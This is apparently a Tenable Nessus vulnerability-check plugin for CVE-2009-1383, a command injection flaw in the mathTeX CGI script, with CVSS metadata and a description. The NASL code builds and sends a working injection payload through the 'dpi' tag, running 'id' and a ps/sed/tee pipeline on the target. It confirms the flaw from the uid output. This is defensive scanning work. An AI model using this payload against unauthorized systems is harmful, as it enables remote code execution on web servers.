CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
85.1%
The remote web server hosts mathTeX, a CGI script for displaying math on the web.
The version of this application installed on the remote host fails to sanitize input via the ‘dpi’ or ‘density’ tags in an expression of shell metacharacters in the ‘getdirective’ function before using it in a call to the Perl ‘system()’ function.
An unauthenticated, remote attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges under which the web server operates.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(49778);
script_version("1.14");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2009-1383");
script_bugtraq_id(43599);
script_name(english:"mathTeX mathtex.cgi getdirective Function dpi Tag Arbitrary Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that allows execution of
arbitrary commands.");
script_set_attribute(attribute:"description", value:
"The remote web server hosts mathTeX, a CGI script for displaying math
on the web.
The version of this application installed on the remote host fails to
sanitize input via the 'dpi' or 'density' tags in an expression of
shell metacharacters in the 'getdirective' function before using it
in a call to the Perl 'system()' function.
An unauthenticated, remote attacker can leverage this issue to execute
arbitrary code on the remote host subject to the privileges under
which the web server operates.");
script_set_attribute(attribute:"see_also", value:"http://ocert.org/advisories/ocert-2009-010.html");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2009/Jul/75");
# https://groups.google.com/forum/#!topic/comp.text.tex/XVbT10Q1FXg
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f7e19804");
script_set_attribute(attribute:"solution", value:
"Upgrade to a version of mathTeX released on or after July 13th, 2009.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(78);
script_set_attribute(attribute:"vuln_publication_date", value:"2009/05/25");
script_set_attribute(attribute:"patch_publication_date", value:"2009/05/26");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/06");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");
port = get_http_port(default:80);
cmd = 'id';
cmd_pat = "uid=[0-9]+.*gid=[0-9]+.*";
magic = SCRIPT_NAME + '-' + unixtime();
find_file = 'ps ax | ' +
'fgrep "' + magic + '" | ' +
'egrep "/[0-9a-fA-F]+\\.gif" | ' +
'tail -1 | ' +
'sed -n -e \'s/.*dvips.ps //\' -e \'s/gif >convert.*/gif/p\' | tee /tmp/foo4';
exploit = cmd + ' > $(' + find_file + ') | echo ' + magic + ' ';
expr = "\dvips" +
"\dpi{150|" + urlencode(str:exploit) + "}";
# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/mathtex", "/cgi-bin/mathtex", cgi_dirs()));
else dirs = make_list(cgi_dirs());
output = "";
mathtex_installs = 0;
vuln_urls = make_list();
foreach dir (dirs)
{
foreach ext (make_list(".cgi", ".pl"))
{
url = dir + '/mathtex' + ext + '?' + expr;
res = http_send_recv3(port:port, method:"GET", item:url, exit_on_fail:TRUE);
if (!res[2]) continue;
headers = parse_http_headers(status_line:res[0], headers:res[1]);
if (isnull(headers)) exit(1, 'Error parsing HTTP headers on port '+port+'.');
# If the output looks like it's from the script...
content_type = headers['content_type'];
if (headers['content-type'] && 'image/gif' >< headers['content-type'])
{
mathtex_installs++;
}
# otherwise continue unless we're being paranoid.
else if (report_paranoia < 2)
{
continue;
}
if (egrep(pattern:cmd_pat, string:res[2]))
{
vuln_urls = make_list(vuln_urls, url);
if (!output) output = res[2];
break;
}
}
if (output && !thorough_tests) break;
}
if (max_index(vuln_urls))
{
if (report_verbosity > 0)
{
if (max_index(vuln_urls) == 1) s = '';
else s = 's';
header =
"Nessus was able to execute the command '" + cmd + "' on the remote" + '\n' +
'host using the following URL' + s;
trailer = '';
if (report_verbosity > 1)
{
trailer =
'This produced the following output :\n' +
'\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
data_protection::sanitize_uid(output:output) +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
'\n';
}
trailer +=
'Note that some browsers will try to render the response from the URL' + s + '\n' +
'above as an image and display an error rather than command output. If\n' +
'this happens, try an alternate browser or send the request manually.\n';
report = get_vuln_report(items:vuln_urls, port:port, header:header, trailer:trailer);
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
else
{
if (mathtex_installs == 0) exit(0, "No installs of mathTeX were found on the web server on port "+port+".");
else if (mathtex_installs == 1) exit(0, "The mathTeX install hosted on the web server on port "+port+" is not affected.");
else exit(0, "The mathTeX installs hosted on the web server on port "+port+" are not affected.");
}